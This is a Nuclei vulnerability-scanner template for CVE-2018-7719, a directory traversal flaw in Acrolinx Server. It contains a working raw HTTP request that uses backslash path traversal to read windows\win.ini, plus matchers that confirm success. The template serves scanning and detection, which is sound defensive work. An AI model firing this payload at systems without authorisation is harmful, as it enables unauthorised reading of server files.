nuclei-templates/cves/2018/CVE-2018-7719.yaml

39 lines
1.1 KiB
YAML

id: CVE-2018-7719
info:
name: Acrolinx Server <5.2.5 - Local File Inclusion
author: 0x_akoko
severity: high
description: |
Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.
reference:
- https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html
- https://www.cvedetails.com/cve/CVE-2018-7719
- https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases-
- https://www.exploit-db.com/exploits/44345/
- https://nvd.nist.gov/vuln/detail/CVE-2018-7719
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-7719
cwe-id: CWE-22
tags: cve,cve2018,acrolinx,lfi
requests:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# Enhanced by mp on 2022/06/17